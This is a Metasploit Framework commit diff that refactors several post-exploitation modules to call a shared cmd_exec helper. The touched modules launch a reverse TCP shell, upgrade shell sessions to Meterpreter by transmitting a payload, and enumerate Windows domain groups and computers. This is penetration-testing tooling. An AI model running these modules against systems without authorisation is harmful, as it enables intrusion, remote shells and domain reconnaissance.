Land rapid7#5629, moar cmd_exec refactoring

wvu · wvu · commit 399b3d2810ea · 2015-07-01T00:36:19.000-05:00
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
@@ -122,7 +122,11 @@ def cmd_exec(cmd, args=nil, time_out=15)
 
       process.close
     when /shell/
-      o = session.shell_command_token("#{cmd} #{args}", time_out)
+      if args.nil? || args.empty?
+        o = session.shell_command_token("#{cmd}", time_out)
+      else
+        o = session.shell_command_token("#{cmd} #{args}", time_out)
+      end
       o.chomp! if o
     end
     return "" if o.nil?
diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb
@@ -170,7 +170,7 @@ def shell_registry_cmd(suffix, view = REGISTRY_VIEW_NATIVE)
     elsif view == REGISTRY_VIEW_64_BIT
       cmd += " /reg:64"
     end
-    session.shell_command_token_win32("#{cmd} #{suffix}")
+    cmd_exec("#{cmd} #{suffix}")
   end
 
   def shell_registry_cmd_result(suffix, view = REGISTRY_VIEW_NATIVE)
diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb
@@ -16,7 +16,7 @@ def initialize(info={})
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform'      => %w{ bsd linux osx unix win },
-        'SessionTypes'  => [ 'meterpreter','shell' ]
+        'SessionTypes'  => ['meterpreter']
       ))
     register_options(
       [
@@ -27,7 +27,6 @@ def initialize(info={})
 
   # Run Method for when run command is issued
   def run
-    session_type = session.type
     print_status("Running module against #{sysinfo['Computer']}")
     if not ::File.exists?(datastore['RESOURCE'])
       raise "Resource File does not exists!"
@@ -41,11 +40,7 @@ def run
           tmpout << "      Output of #{cmd}\n"
           tmpout << "*****************************************\n"
           print_status "Running command #{cmd.chomp}"
-          if session_type =~ /meterpreter/
-            tmpout << cmd_exec(cmd.chomp)
-          elsif session_type =~ /shell/
-            tmpout << session.shell_command_token(cmd.chomp).chomp
-          end
+          tmpout << cmd_exec(cmd.chomp)
           vprint_status tmpout
           command_log = store_loot("host.command", "text/plain", session,tmpout ,
             "#{cmd.gsub(/\.|\/|\s/,"_")}.txt", "Command Output \'#{cmd.chomp}\'")
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -196,12 +196,12 @@ def transmit_payload(exe)
       sent = 0
       aborted = false
       cmds.each { |cmd|
-        ret = session.shell_command_token(cmd)
+        ret = cmd_exec(cmd)
         if !ret
           aborted = true
         else
           ret.strip!
-          aborted = true if !ret.empty?
+          aborted = true if !ret.empty? && ret !~ /The process tried to write to a nonexistent pipe./
         end
         if aborted
           print_error('Error: Unable to execute the following command: ' + cmd.inspect)
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
@@ -59,7 +59,7 @@ def run
 
     if not cmd.empty?
       print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
-      session.shell_command_token("(#{cmd} &)")
+      cmd_exec("(#{cmd} &)")
     end
   end
 
diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb
@@ -29,7 +29,6 @@ def initialize(info={})
   def run
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
     domain = get_domain()
-
     if not domain.empty?
       hostname_list = get_domain_computers()
       list_computers(domain, hostname_list)
@@ -49,7 +48,7 @@ def gethost(hostname)
   def get_domain_computers()
     computer_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net view").split(devisor)[1]
+    raw_list = cmd_exec('net view').split(devisor)[1]
     if raw_list =~ /The command completed successfully/
       raw_list.sub!(/The command completed successfully\./,'')
       raw_list.gsub!(/\\\\/,'')
diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb
@@ -58,7 +58,7 @@ def run
   # List local group members
   def list_group_mem(group)
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net localgroup #{group}").split(devisor)[1]
+    raw_list = cmd_exec("net localgroup #{group}").split(devisor)[1]
     account_list = raw_list.split("\r\n")
     account_list.delete("The command completed successfully.")
     return account_list
@@ -68,7 +68,7 @@ def list_group_mem(group)
   def list_domain_group_mem(group)
     account_list = []
     devisor = "-------------------------------------------------------------------------------\r\n"
-    raw_list = client.shell_command_token("net groups \"#{group}\" /domain").split(devisor)[1]
+    raw_list = cmd_exec("net groups \"#{group}\" /domain").split(devisor)[1]
     raw_list.split(" ").each do |m|
       account_list << m
     end
